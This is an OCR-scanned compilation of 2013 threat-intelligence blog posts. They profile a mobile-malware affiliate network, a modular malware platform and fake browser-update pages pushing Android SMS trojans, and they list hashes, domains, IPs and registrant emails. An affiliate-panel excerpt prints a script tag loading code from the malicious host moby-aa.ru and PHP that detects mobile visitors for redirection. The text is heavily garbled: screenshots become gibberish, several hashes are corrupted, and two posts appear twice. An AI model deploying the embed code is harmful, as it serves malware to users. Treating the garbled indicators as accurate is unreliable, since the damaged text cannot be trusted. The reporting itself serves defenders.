MD5: 3ee70d31d0a3b6fab562c51d8ff70e6d 

MD5: 3381d21f476d123dcf3b5cbc27b22ael1 
MD5: 006632148ce6747fddb6d89e5725573e 
MD5: 7a4639488b4698f131e42de56ceeb45d 
MD5: b9667e23bd400edcafde58b61ac05f96 
MD5: 12527fd41dd6b172f8e28049011ebd05 
MD5: c9baecb122bb6d58f765aaca800724d2 
MD5: 799531e06e6aa19d569595d32d16f7cc 
MD5: e301¢c2135724db49f4dd5210151e8ae9 


MD5: 29d7c73bd737d5bb48f272468a98d673 


In 2013, we can easily differentiate between the [9]botnet building type of [10]two-factor 
authentication bypassing mobile trojans, and the ubiquitous for the market segment, subscrip- 
tion based premium rate SMS malware, relying on deceptive advertising and successful ‘visual 
social engineering’ campaigns. The second, continue getting largely monetized through one 
of the primary growth factors of the mobile market segment, namely, [11]affiliate networks 
for mobile malware. 


In this post, I'll profile what can be best described as a sophisticated, customer-ized, 
customization and efficiency oriented, APl-supporting, DIY mobile "lab" for generating, man- 
aging and operating multi-mobile-operating systems type of mobile malware campaigns. 
The service’s unique value proposition (UVP) in comparison to that of competing "labs" for 
managing, operating and converting mobile traffic - [12 ]acquisition and selling of [13]mobile 
traffic is a commoditized underground market item in 2013 - orbits around the feature rich 
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interface, offering 100 % customization, monitoring and generally operating the campaigns, 
while efficiently earning fraudulently obtained revenue from unsuspecting mobile device 
users. 


Sample screenshots featuring the administration panel of an affiliate network partici- 
pant: 


. 
e —— 
Cen Baw GanaHc: 0,00 p. 
Benn 
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Comatb NoToK 
Tpadbax Janpysen AxTMenoct Sms Nogneckn Bcero 
Dlewb/Yac Xocte: Yin Bce / Yue 1K Yctawosx Pamo Kon-g0 Pamo Dloxoa nan PEG loxoa Moxon 
0 0 on 0 0 0.00$ 0 0 0.00$ 0.00$ 
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Java Script: 
<script type="lext/javascript™ src="htp://moby-aa. ruljs?id=foeabntmiAlet=1 “></script> . 
PHP: ee 
<?phy y 
PRP Va 


function MebilabsDetectPhone() { 
a£($_GET["noredirect'}){ 
return false; 
) 
if($_SERVER['HTTP_USER_AGENT') == "Mozilla/S.0 (Linux: U; Android 2.2; en-us; Nexus One Build/FRF91) 
AppleWebdKit/S$33.2 (KHTML, iike Gecko) Version/4.0 Mobile Safari/533.i offiine'){ 
return false; 
} 
Suser_agent = $_SERVER('HTTP_USER_AGENT"]: 
if (preg_match (*/android|blackberry|iphone|symbian/i', Suser_agent)) { 
return ‘'full': 
} 
at ( 
asset ($_SERVER['HTTP_PROFILE'}) || 
agset ($_SERVER['HTTP_WAP_PROFILE')})// 
isset ($_SERVER['HTTP_X_WAP_PROFILE*)}) || 
asset ($_ _SERVER([' HTTP x1 WAP! PROFILE _DIFF"}) 11 
isset($ SERVER [ HTTP _ x OPERAMINI- -PHONE-UA'}) 11 
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Sample "system" domains used for hosting/rotating the generated mobile malware samples 


courtesy of the service: 
jmobi.net - 91.202.63.75 
omoby.net - 91.202.63.75 
rrmobi.net - 91.202.63.75 


moby-aa.ru - 91.202.63.75 
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mobyc.net - 91.202.63.75 
mobi-files.com - 91.202.63.75 
mobyw.net - 91.202.63.75 
mobyy.net - 91.202.63.75 
mobyc.net - 91.202.63.75 


mobyz.net - 91.202.63.75 


Known to have responsed to the same IP are also the following malicious domains: 
doklamenol.ru 
doklameno2.ru 
downloadakpinstall.ru 
mobiy.net 

moby-aa.ru 
moby-ae.ru 
mobyc.net 
mobyw.com 
mobyw.net 
mobyy.net 

mobyz.net 

omoby.net 

rrmobi.net 
system-update.ru 


telefontown.pp.ua 


Sample Web sites serving multi-mobile-operating-system premium rate mobile malware, 
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relying on the service: 
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KATEFOPHK 


TON NPUJOMEHMM 


Ftuv sO 
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AHTHBMPYCA ' SECURITY 
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f. Scramonie Boats 


Y Desktops | Ei 
Seguro @ e 
x orreeuer eg 
On Team hacky 
| Google Trandate | 


Samples generated and currently distributed in the wild using the service: 


[14]MD5: ac69514f9632539f9e8ad7b944556ed8 - detected by 15 out of 48 antivirus 
scanners as HEUR:Trojan-SMS.AndroidOS.Stealer.a 


[15]MD5: e62f97a095ca15747bb529ee9f1b5057 - detected by 2 out of 45 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[16]MD5: 0688dac2754cce01183655bbbe50a0b1 - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
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[17]MD5: 4062a77bda6adf6094f4ab209c71b801 - detected by 2 out of 44 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[18]MD5: 42a6cf362dbff4fd1lb5aa9e82c5b7b56 - detected by 2 out of 45 antivirus scan- 
ners as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[19]MD5: 3bcbe78a2fa8c050ee52675d9ec931ad - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[20]MD5: 53d3d35cf896938e897de002db6ffc68 - detected by 2 out of 47 antivirus scan- 
ners as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[21]MD5: 2f66735b37738017385cc2fb56c21357 - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[22]MD5: 0ecl1lbba4a6a86eb517 1lecad89d78d05 - detected by 2 out of 47 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[23]MD5: 9f059c973637f105271d345a95787a5f - detected by 2 out of 45 antivirus scan- 
ners as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[24]MD5: f179a067580014b1e16900b90d90a872 - detected by 2 out of 47 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[25]MD5: aef4f659943cbc530e4e1b601e75b19e - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[26]MD5: 8a00786ed6939a8ece2765d503c97ff8 - detected by 2 out of 45 antivirus scan- 
ners as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[27]MD5: 868fcf05827c092fa1939930c2f50016 - detected by 2 out of 45 antivirus scan- 
ners as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[28]MD5: a6ef49789845ed1a66f94fd7ccO89elb - detected by 2 out of 47 antivirus scan- 
ners as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[29]MD5: 22aa473772b2dfb0f019dac3b8749bb6 - detected by 2 out of 45 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[30]MD5: 52b74046d0c123772566d591524b3bf7 - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[31]MD5: bbff61a2e3555a6675bc77621be19a73 - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[32]Cybercrime-friendly affiliate networks continue, and will continue to represent a ma- 
jor driving factor behind the growth of any market segment within the cybercrime system, 
as they result in a win-win-lose scenario for their operations, participants and the potential 
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victims of the fraudulent/malicious propositions/releases courtesy of these networks. 


With mobile traffic acquisition available on demand based on any given preference a po- 
tential could have, cybercriminals would continue converting it into victims, cashing in on 
their overall lack of awareness of the TTPs of today’s modern cybercriminals. 


Updates will be posted as soon as new developments take place. 


1. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment.htm 
2. http: //www.webroot.com/blog/tag/affiliate-networks/ 
3. 


ttp://www.webroot.com/blog/2013/09/18/affiliate-network-mobile-malware-impersonates-google-play-tricks- 
"hvtp://Adanchey blogspot. con/2007/06 connercializing-asbile-nalvare_18.htal 
case elegance 01 nowt aetine teen" capa vane 
_hetp://adanchey blogspot. cou/2001/0T /nalvare-nbedded-sites~increasing ta 
sep: /ave anvernstaeve.con/sireleoa/article.pip/S50405] 


ttp://ddanchev.blogspot.com/2009/07/transmitterc-mobile-malware-in-wild.htm 


ON au 


9. bttp://www.webroot .com/blog/2013/10/25/cybercriminals-release-new-commercially-available-androidblackber 


y-supporting-mobile-malware-bot/ 
10. http://ddanchev. blogspot .com/2013/07/a-peek-inside-managed-otpatstan-token.htm 


11. http://www.webroot .com/blog/2013/09/18/affiliate-network-mobile-malware-impersonates-google-play-tricks 
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24. 
25. 
ysis/1383784127/ 

26. 
27: 
ysis/1383784294/ 

28. 
29. 
30. 
ysis/1383784624/ 

31, 


32. http://www.zdnet .com/blog/security/inside-an-affiliate-spam-program-for-pharmaceuticals/2054 


9.11.9 New Commercially Available Modular Malware Platform Released On the Un- 
derground Marketplace (2013-11-13 00:15) 


Cybercriminals have recently released a new (v3 to be more precise indicating possible 
beneath the radar operation until now), commercially available, modular malware platform, 
including such cybercrime-friendly features like DNS Changer, Loaders, [1]Injects, and [2]Ran- 
somware features - completely blocking the Internet access of [3]the affected user in this 
particular case - with several upcoming modules such as stealth VNC, and Remote IE (a 
feature which would allow them to completely hijack any sort of encrypted session taking 
place on the affected host, naturally including the cookies). 


Sample screenshots of the command and control interface+DNS Changer in action: 
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With prices for the standard package starting from $1,500, | expect that the malware bot will 
quickly gain market share thanks to its compatibility with existing/working crimeware con- 
cepts/releases, as well as thanks to the general availability of 24/7/365 [4]managed malware 
crypting services, applying the necessary degree of QA (Quality Assurance) to a potential 
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campaign before launching it. Moreover, yet another factor that would greatly contribute 
to the success of such type of newly released platforms is the the ease of acquisition of 
legitimate traffic - think [5]blackhat SEO, [6]compromised FTP accounts, or [7]mass SQL 
injection campaigns - to be later on converted into malware-infected hosts, most commonly 
through social engineering, or the client-side exploitation of outdated and already patched 
vulnerabilities in browser plugins/third-party applications. 


Furthermore, with or without the full scale modularity in place - some of the modules 
are currently in the works, as well as the lack of built-in renting/reselling/traffic acquisi- 
tion/affiliate network type of monetization elements, typical for what can be best described 
as platform type of underground market release compared to a standalone modular malware 
bot, the bot’s worth keeping an eye on. 


The DNS Changer IP seen in the screenshot 62.76.176.214 (62-76-176-214.clodo.ru), 
can also be connected to related malicious activity. For instance, [8]MD5: 
cef012fb4fa7cd55f04558ecee04cd4e is known to have previously phoned back to 
62.76.176.214. 


And most interestingly, [9]according to this assessment, next to phoning back to 
62.76.176.214, the following malicious domains are also known to have been used as C 
&Cs by the same sample: 

6r3u8874dfd9.com - known to have responded to 311.170.179.179 

r55u87799hd39.com - known to have responded to 31.170.179.179 

r95u8114dfd9.com 


The following malicious MD5s are also known to have phoned back to the same C &C 
IP (31.170.179.179) since the beginning of the month: 
MD5: 56f05611ec91f010d015536b7e9fela5 
MD5: 49aeaa9fad5649d20a9c56e611e81d96 
MD5: bf4fa138741ec4af0a0734b28142f7ae 
MD5: cd92df2172a40ebb507fa701dcb14fea 
MD5: 1d51cdelab7al1d3d725e507089d3ba5e 
MD5: a00695df0a50b3d3ffeb3454534d97a8 
MD5: ea8340c95589ca522dacle04839a9ab9 
MD5: f2933ca59e8453a2b50f6d38a9ad9709 
MD5: dd9c4ba82de8dcf0f3e440b302e223e8 
MD5: d92ad37168605579319c3dff4d6e8c26 
MD5: 004bf3f6b7f49d5c650642dde3255b16 
MD5: deb8bcd6c7987ee4e0a95273e76feccd 
MD5: 1791cb3e3da28aec11416978f415dcd3 
MD5: 7eae6322c9dcaa0f12a99f2c52b70224 
MD5: 0027511d25a820bcdc7565257fd61ba4 
MD5: 294edcdaab9ce21cb453dc40642f1561 
MD5: b414d9f54a723e8599593503fe0de4f1 
MD5: 20ee0617e7dc03c571ce7d5c2ee6a0a0 
MD5: e1059ae3fb9c62cf3272eb6449de23cf 


This post has been reproduced from [10]Dancho Danchev’s blog . Follow him 
[11]Jon Twitter. 
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. http://ddanchev. blogspot .com/2013/07/a-peek- inside-managed-otpatstan-token.htm 
. http: //www.webroot .com/blog/tag/ransomware/ 


ttps://www.google.com/webhp?tab=wwkei=#q=site :ddanchev. blogspot .com+ransomware 


ttps://www .com/webhp?tab=wwkei=#q=site :webroot.com/,2Fblog+crypting 


ttps://www.google.com/webhp?tab=wwkei=#q=site :ddanchev. blogspot .com+ftptaccounts 


ttps://www .com/webhp?tab=ww&kei=#q=site:ddanchev. blogspot .comt+sql+injectio 


. https://www.virustotal .com/en/file/4ca375c6db3d32dde7b981b098107 9d8e13bd121a81c835d58d02a046d98277f/analys 


1 
2 
3 
4 
5. https://www. google.com/webhp?tab=wwkei=#q=site:ddanchev. blogspot .com+blackhat+seo 
6 
7 
8 


ttp://www.symantec.com/security_response/writeup. jsp?docid=2013-101610-5035-99&tabid=2 


10. http://ddanchev. blogspot .com/ 
11. http://twitter .com/danchodanche 


9.11.10 New Commercially Available Modular Malware Platform Released On the Un- 
derground Marketplace (2013-11-13 00:15) 


Cybercriminals have recently released a new (v3 to be more precise indicating possible 
beneath the radar operation until now), commercially available, modular malware platform, 
including such cybercrime-friendly features like DNS Changer, Loaders, [1]Injects, and [2]Ran- 
somware features - completely blocking the Internet access of [3]the affected user in this 
particular case - with several upcoming modules such as stealth VNC, and Remote IE (a 
feature which would allow them to completely hijack any sort of encrypted session taking 
place on the affected host, naturally including the cookies). 


Sample screenshots of the command and control interface+DNS Changer in action: 
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With prices for the standard package starting from $1,500, | expect that the malware bot will 
quickly gain market share thanks to its compatibility with existing/working crimeware con- 
cepts/releases, as well as thanks to the general availability of 24/7/365 [4]managed malware 
crypting services, applying the necessary degree of QA (Quality Assurance) to a potential 
campaign before launching it. Moreover, yet another factor that would greatly contribute 
to the success of such type of newly released platforms is the the ease of acquisition of 
legitimate traffic - think [5]blackhat SEO, [6]compromised FTP accounts, or [7]mass SQL 
injection campaigns - to be later on converted into malware-infected hosts, most commonly 
through social engineering, or the client-side exploitation of outdated and already patched 
vulnerabilities in browser plugins/third-party applications. 


Furthermore, with or without the full scale modularity in place - some of the modules 
are currently in the works, as well as the lack of built-in renting/reselling/traffic acquisi- 
tion/affillate network type of monetization elements, typical for what can be best described 
as platform type of underground market release compared to a standalone modular malware 
bot, the bot’s worth keeping an eye on. 


The DNS Changer IP seen in the screenshot 62.76.176.214 (62-76-176-214.clodo.ru), 
can also be connected to related malicious activity. For instance, [8]MD5: 
cef012fb4fa7cd55f04558ecee04cd4e is known to have previously phoned back to 
62.76.176.214. 


And most interestingly, [9]according to this assessment, next to phoning back to 
62.76.176.214, the following malicious domains are also known to have been used as C 
&Cs by the same sample: 

6r3u8874dfd9.com - known to have responded to 31.170.179.179 

r55u87799hd39.com - known to have responded to 31.170.179.179 


r95u8114dfd9.com 


The following malicious MD5s are also known to have phoned back to the same C &C 
IP (31.170.179.179) since the beginning of the month: 


MD5: 56f05611ec91f010d015536b7e9fela5 


MD5: 49aeaa9fad5649d20a9c56e611e81d96 
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MD5: bf4fal38741ec4af0a0734b28142f7ae 
MD5: cd92df2172a40ebb507fa701ldcb14fea 
MD5: 1d51cdelab7a1d3d725e507089d3ba5e 
MD5: a00695df0a50b3d3ffeb3454534d97a8 
MD5: ea8340c95589ca522dacle04839a9ab9 
MD5: £2933ca59e8453a2b50f6d38a9ad9709 
MD5: dd9c4ba82de8dcf0f3e440b302e223e8 
MD5: d92ad37168605579319c3dff4d6e8c26 
MD5: 004bf3f6b7f49d5c650642dde3255b16 
MD5: deb8bcd6c7987ee4e0a95273e76feccd 
MD5: 1791cb3e3da28aec11416978f415dcd3 
MD5: 7eae6322c9dcaa0f12a99F2c52b70224 
MD5: 0027511d25a820bcdc7565257fd61ba4 
MD5: 294edcdaab9ce21cb453dc40642f1561 
MD5: b414d9f54a723e8599593503fe0de4f1 
MD5: 20ee0617e7dc03c571ce7d5c2ee6a0a0 


MD5: e1059ae3fb9c62cf3272eb6449de23cf 


Updates will be posted as soon as new developments take place. 


. http: //ddanchev. blogspot .com/2013/07/a-peek- inside-managed-otpatstan-token.htm 
. http: //www.webroot .com/blog/tag/ransomware/ 


. https: //www.google.com/webhp?tab=wwkei=#q=site:ddanchev. blogspot .com+transomware 


. https://www.google.com/webhp?tab=wwkei=#q=site : webroot .com/,2Fblog+crypting 


. https: //www.google.com/webhp?tab=wwkei=#q=site:ddanchev.blogspot.com+ftptaccounts 


. https://www.google.com/webhp?tab=wwkei=#q=site : ddanchev.blogspot.comtsqlt+injectio 
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9.11.11 Fake Chrome/Firefox/Internet Explorer/Safari Updates Expose Users to An- 
droid Malware (2013-11-14 16:38) 


A currently ongoing [1]malicious campaign using compromised sites as the primary traffic 
acquisition tactic, is attempting to socially engineer users (English and Russian speak- 
ing) into thinking that they’re using an outdated version of their browser, and need to 
apply a bogus (security/antivirus) update. In reality though, the update is a variant of 
Trojan:Android/Fakeinst.EQ/Android.SmsSend. 


Sample screenshots of the fake browser update landing pages: 


om chrome O6HoBneHne Spaysepa 


Buumanve! Baw 6paysep yctapen, 
HeKOTOpbie NNarMtb!l paboTAaHoT HEKOPPeKTHO. 
STO CyECTBEHHO BNuAeT Ha GesonacHocTD! 


BbecnnatTHble O6OHOBNeHUA 
Chrome 


OGmosnexHan BepciA Gpaysepa, KADeXKHO 3auyTHT Bal KOMNBIOTep OT BHELUHIK 
yrpos 4 Npesoctasur Bam GesonacHol, Gbicpesl 4 KomcbopTHbI Cepd>unr 6 
MHTepHETe 


E€ Chrome English 
E€ Chrome Pyccxisit 


Bawa sepcun Gpay3epa ° E€ Chrome Pyccxuit + AHTHaupycHoe o6woBneHne 
Chrome 


CMMbHO ycTrapena 


(pexomenpyerca) 


Yeranonnrs Chrome 
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mozilla 


Bawa Bepcun Gpay3epa 
Firefox 
CUMbHO ycTapena 


& Windows 


Bawa Bepcna Gpay3sepa 
Internet Explorer 
CUNbHO ycTapena 


O6xHosneHne Spaysepa 


Brumanne! Baw Gpaysep yctapen, 
HeKOTOpbie NNarvHb! paboTaloT HEKOPPeKTHO. 
STO CyLECTBEHHO BNMAeT Ha GesonacHoctTo! 


Becnaamnpile o6HoeAeHUA 
Firefox 


O6HosNeHKAaR BeEpCHA Opaysepa, HaQe@KHO 3auyTHT Baw KOMNbIOTep OT BHEWHIK 
yTpos # NpegocTasuT Bam Gesonachbili, Gbicpeat 1 KOMCDOPTHEI Cepdbner B 
wHTepHeTe 


BbIGBEPMTE NAKET OBHOBNEHMM 
ro) & Firefox English 


° & Firefox Pyccrai 


® & Firefox Pycciai + AntpnpycHoe o6HosneHHe 
(pexomennyeTca) 


- . 
~~ W Yeranosuts @& 


OG6xHosnexnue Gpayzepa 


Buumaxne! Baw Gpayzep ycrapen, 
HEKOTOpBIe NNarutb! paboTaioT HEKOPPeKTHO. 
STo CyWjeCTBeHHO BnuAeT Ha GesonacHocTe! 


becnnatTHbie 
O6HOBNeHUA 
Internet Explorer 


O6HOeNeHHaR BepCcHA Spayzepa, HaReHHO 3aumtTMT Baw KOMNbIOTep OT BHEWHIX 
yfpos # NpegocTasyT Bam Sesonachbilt, Geicpbiii M KOMMOPTHEIM CepduHr B 
nHTepHETe 


BbIBEPUTE NAKET OBHOBNEHMIM 
ro) ee Intemet Explorer English 


oO e@ Iimemet Explorer Pycckii 


® ea Internet Explorer Pyccrati + AxTupupycHoe obHoBneHHe 
(peKoMennyeTcA) 


Buumanne! Baw 6paysep yctapen, 
He@KOTOPbIe NNaMxbt paGboTawT HEKOPPEKTHO. 
STO CYWECTBEHHO BNuRET Ha GesonacHocTD! 


Becnaamnole o6Hoenenun 
Safari 


OGHoenennan sepcia Gpaysepa, HaQexHO JauyTHT Baw KOMMAOTep OT 
BHELUHHX YTPO3 H NpegocTaenT Bam Gesonaches, Oeicpbilt u KOMM@OpTHEst 


cepdbanr BMHTepHEeTe 
c @ Satan Engish 
Bawa sepcun 6paysepa c 8 Satan Pyooast 
Safari 
CHNMbHO ycTapena e @ Safari Pyooas + Antnampyoice o6noaneme 
(pexomennye tc) 


Social engineering redirection chain: hxxp://france-leasebacks.com/includes/domit/1.php -> 
hxxp://advertcliks.net/ir/28/1405/56e9ca1335c2773445a79d5ddf75a755/tl (93.115.82.239; 
Email: maxaxaha@gmail.com) -> hxxp://newupdateronline.org (109.163.230.182; Email: 
vbistrin@yandex.com). 


Known to have responded to 109.163.230.182 are also the following domains: 
1mc8.asia 

anglecultivatep.in 

appallinglyndiscoveries.in 
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bilious-6biros.in 
boathire.pw 
cvwv87.pro 
disdcncnew1.pw 
efuv77.pro 
familye-perspex.in 
farting-meagre.in 
flvupdate.in 
fringeclamberedk.in 
hopefully-great8.in 
investment-growsa.asia 
money-tree.pw 
moon-media.pw 
moontree.pw 
mountainlake.pw 
movingv-relation.in 
new-updateronline.org 


Sample Android samples pushed by the campaign: 

[2]MD5: da7fffa08bdeb945ca8237c2894aedd0 - detected by 11 out of 46 antivirus scanners 
as Android.SmsSend.809.origin; Android. Trojan.Fakelnst.HE 

[3]MD5: 1e1f57f6c8c9fb39da8965275548174f - detected by 17 out of 46 antivirus scanners 
as HEUR:Trojan-SMS.AndroidOS.Fakelnst.fe; Andr/RuSms-AL 

[4]MD5: b0f597636859b7f5b2c1574d7a8bbbbb - detected by 13 out of 47 antivirus scanners 
as HEUR:Trojan-SMS.AndroidOS.Fakelnst.fe; Andr/RuSms-AL 

[5]MD5: b40aebc327elbc6aabe5ccbh4fl8e8ea4 - detected by 16 out of 48 antivirus scanners 
as Android:Fakelns-AF; Trojan:Android/Fakeinst.EQ 


All samples phone back to _ disdcncnew.net (109.163.230.182; Email: con- 
stantin.zawyalov@yandex.ru). Responding to the same IP is also newapk-flv.org. 


The same email is also known to have been previously used to register the following 
domains: 

downloader8days.in 

open-filedownload4.in (Known to have responded to 188.95.159.30) 
upweight.in 

bestnewbrowsers.in 

bestowedcomedyb.org (Known to have responded to 109.163.230.180) 
expandload.in 

2012internet-load.in 

Ainterfilefolder.in 

99030.in 

admitted-6crept.org 

rufileserver.in 


It appears that the traffic is not segmented - to [6]affect mobile device users only - at 
any point of the redirection chain, an indication of what | believe is a boutique cybercrime- 
friendly operation. In comparison, the relatively more sophisticated ones would segment the 
traffic, usually acquired through the [7]active exploitation of tens of thousands of legitimate 
Web sites, or the direct purchase of segmented mobile traffic. 


4878 


Interestingly, both novice players in this market segment, and the experienced ones, 
are implementing basic evasive tactics, such as, for instance, the need to provide a valid 
mobile number, where a potential victim will receive a confirmation code for accessing the 
inventory of rogue games and applications, thereby preventing automatic acquisition of the 
apps for further analysis. Moreover, providing a valid mobile number to the cybercriminals 
behind the campaign, is naturally prone to be abused in ways largely based on the preferences 
of those who obtained them through such a way, therefore users are advised not to treat their 
mobile number in a privacy conscious way. 


This post has been reproduced from [8]Dancho Danchev’s blog . Follow him 
[9]Jon Twitter. 


ttp://ddanchev. blogspot .com/2013/09/rogue- iframe-injected-web-sites-lead-to.htm 


1. 
2. https://www.virustotal .com/en/file/2ef49d2ba03c8d9420e008edb8d04fb3abad2fd41684e65d0d47 ef 5£c4d2787a/analys 


ttp://ddanchev. blogspot .com/2013/09/rogue-iframe-injected-web-sites-lead-to.htm 


8. http: //ddanchev.blogspot.com/ 
9. http: //twitter .com/danchodanche 


9.11.12 Fake Chrome/Firefox/Internet Explorer/Safari Updates Expose Users to An- 
droid Malware (2013-11-14 16:38) 


A currently ongoing [1]malicious campaign using compromised sites as the primary traffic 
acquisition tactic, is attempting to socially engineer users (English and Russian speak- 
ing) into thinking that they’re using an outdated version of their browser, and need to 
apply a bogus (security/antivirus) update. In reality though, the update is a variant of 
Trojan:Android/Fakeinst.EQ/Android.SmsSend. 


Sample screenshots of the fake browser update landing pages: 
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@ chrome O6HoBneHne Spaysepa 


Brumanue! Baw 6paysep yctapen, 
HeKOTOpbIe NNarMHb! paboTaiwT HEKOPPeKTHO. 
STO CYLWECTBEHHO BNuReT Ha GesonacHocT! 


BecnnatTHble OOHOBNeHUA 
Chrome 


O6mosnesHan Bepcua Gpay3epa, HanexHo 3aupTHT Bal KOMNeOTep OT BHELUHIKX 
yfpos u npegoctasut Bam Ge3sonacHem, Gbicpesl # KOMCpOpTHbI CepqbuHr 6 
WHTepHETe 


BbIBEPU TE NAKET OGHOBNEHMM: 


© crrome Engish 
€ Chrome Pyccxast 
Bawa sepcua Gpay3epa ° € Chrome Pyccxit + AHTHBpycHoe oGHoBNeHHe 
Chrome (pexomennyetca) 


CMNbHO ycTapena 


Yerawoeure Chrome 


mozilla O6HosneHne Gpayzepa 


Buumanue! Baw Opaysep yctapen, 
HeKOTOpbie NNarMbi paboTaioT HEKOPPeKTHO. 
SOTO CYLIECTBEHHO BNuAeT Ha GesonacHocTo! 


Becnaamnple o6HoeAeHUA 
Firefox 


O6HosNeHKaR BepCHA Opaysepa, HaQe@KHO 3euyTHT Baw KOMNbIOTep OT BHEWHIK 
yTpo3 # NDeLocTasuT Bam Gesonachbii, Gbicpeal 4 KOMCDOPTHBH CepdnHr B 
wHTepHETe 


BbIBEPMTE NAKET OBHOBNEHMM 


° & Firefox English 
° & Firefox Pyocat 
Bawa Bepcna Opay3epa © & Firefox Pycciatii + AntmenpycHoe o6xosneHne 
Firefox (peKoMenayerTcar) 


CUNbHO ycTapena 


. xX 
~~ W Yeranosuth & 
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& Windows OGHosnexnne 6payzepa 


Buumaxnve! Baw Gpaysep ycrapen, 
HeKOTOpbIe NNarvnb! paGoTaoT HEKOPPeKTHO. 
STo cywjecTBeHHO BnuAeT Ha GezonacHocTe! 


becnaTHbie 
O6HOBNEHNA 
Internet Explorer 


OGHOeNeHHAR BepCcHA Spayzepa, HagexHO sauyiTHT Baw KOMN_IOTep OT BHEWHHX 
yfpos # NpegocTasuT Bam Gesonachbit, Geicpbiii H KOMMOPTHDI CepduHr B 
wHTepHETe 


BLIGEPUTE MAKET OGBHOBNEHMM 


° Qa Internet Explorer English 


Bawa Bepcna Gpay3epa 
Internet Explorer fe) @ internet Explorer Pyccnati 
CUNbHO ycTapena 
® e imernet Explorer Pycciati + AxTuBupycHoe ObHoBneHHe 
(peKoMennyeTcA) 


Brumanue! Baw 6paysep yctapen, 
HeKOTOPbIe NNarmMikb! PaboTawWT HEKOPPeKTHO. 
STO CyWWECTBEHHO BNuAeT Ha OesonacHocTD! 


Becnaamuole o6xoenenun 
Safari 


OGvioenekHan sepcta Gpayzepa, HAQexHO JaWyHTHT Baw KOMMRSOTep OT 
Gesonactelt 


BHELUHMX YTPOS M NPeQocTasnT Bam , Obicpbit M KOM@OpTHest 
CeptbHHr B HHTepHETEe 
BLISEPMTE NAKET OBHOBNEHHM 
re @ Satan Engtsh 
Bawa sepcun 6Gpaysepa c fo) Satan Pycoos 
Safari 
CHNbHO ycTapena e @ Satan Pyooad + Antuaupyoice o6Honnenne 
(pexomennyeTcr) 


Social engineering redirection chain: hxxp://france-leasebacks.com/includes/domit/1.php -> 
hxxp://advertcliks.net/ir/28/1405/56e9ca1335c2773445a79d5ddf/5a755/tl (93.115.82.239; 
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Email: =maxaxaha@gmail.com) -> hxxp://newupdateronline.org (109.163.230.182; Email: 
vbistrin@yandex.com). 


Known to have responded to 109.163.230.182 are also the following domains: 
1mc8.asia 
anglecultivatep.in 
appallinglyndiscoveries.in 
bilious-6biros.in 
boathire.pw 

cvwv87.pro 
disdcncnew1.pw 
efuv77.pro 
familye-perspex.in 
farting-meagre.in 
flvupdate.in 
fringeclamberedk.in 
hopefully-great8.in 
investment-growsSa.asia 
money-tree.pw 
moon-media.pw 
moontree.pw 
mountainlake.pw 
movingv-relation.in 


new-updateronline.org 


Sample Android samples pushed by the campaign: 
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[2]MD5: da7fffa08bdeb945ca8237c2894aedd0 - detected by 11 out of 46 antivirus scan- 
ners as Android.SmsSend.809.origin; Android. Trojan.Fakelnst.HE 


[3]MD5: lelf57f6c8c9fb39da8965275548174f - detected by 17 out of 46 antivirus scan- 
ners aS HEUR:Trojan-SMS.AndroidOS.Fakelnst.fe; Andr/RuSms-AL 


[4]MD5: b0f597636859b7f5b2c1574d7a8bbbbb - detected by 13 out of 47 antivirus scanners 
as HEUR:Trojan-SMS.AndroidOS.Fakelnst.fe; Andr/RuSms-AL 


[5]MD5: b40aebc327elbc6aabe5ccbh4fl8e8ea4 - detected by 16 out of 48 antivirus scanners 
as Android:Fakelns-AF; Trojan:Android/Fakeinst.EQ 


All samples phone back to dlsdcncnew.net (109.163.230.182; Email: con- 
stantin.zawyalov@yandex.ru). Responding to the same IP is also newapk-flv.org. 


The same email is also known to have been previously used to register the following domains: 
downloader8days.in 

open-filedownload4.in (known to have responded to 188.95.159.30) 
upweight.in 

bestnewbrowsers.in 

bestowedcomedyb.org (known to have responded to 109.163.230.180) 
expandload.in 

2012internet-load.in 

Ainterfilefolder.in 

99030.in 

admitted-6crept.org 


rufileserver.in 


It appears that the traffic is not segmented - to [6]affect mobile device users only - at 
any point of the redirection chain, an indication of what | believe is a boutique cybercrime- 
friendly operation. In comparison, the relatively more sophisticated ones would segment the 
traffic, usually acquired through the [7]active exploitation of tens of thousands of legitimate 
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Web sites, or the direct purchase of segmented mobile traffic. 


Interestingly, both novice players in this market segment, and the experienced ones, 
are implementing basic evasive tactics, such as, for instance, the need to provide a valid 
mobile number, where a potential victim will receive a confirmation code for accessing the 
inventory of rogue games and applications, thereby preventing automatic acquisition of the 
apps for further analysis. 


Moreover, providing a valid mobile number to the cybercriminals behind the campaign, 
is naturally prone to be abused in ways largely based on the preferences of those who 
obtained them through such a way, therefore users are advised not to treat their mobile 
number in a privacy conscious way. 


Updates will be posted as soon as new developments take place. 


1. http: //ddanchev. blogspot .com/2013/09/rogue-iframe-injected-web-sites-lead-to.htm 


2. https: //www.virustotal. com/en/file/2ef49d2ba03c849420e008edb8d04f b3abad2f d41684e65d0d47 ef 5f.c4d2787a/analys 
is/ 
3. https: //www.virustotal. com/en/file/65bb64a9e651ea785d2ba92c2abSbd02t 6353ae47 2df 2dc5£917b7 9bf df 67a10/analys 
is/ 
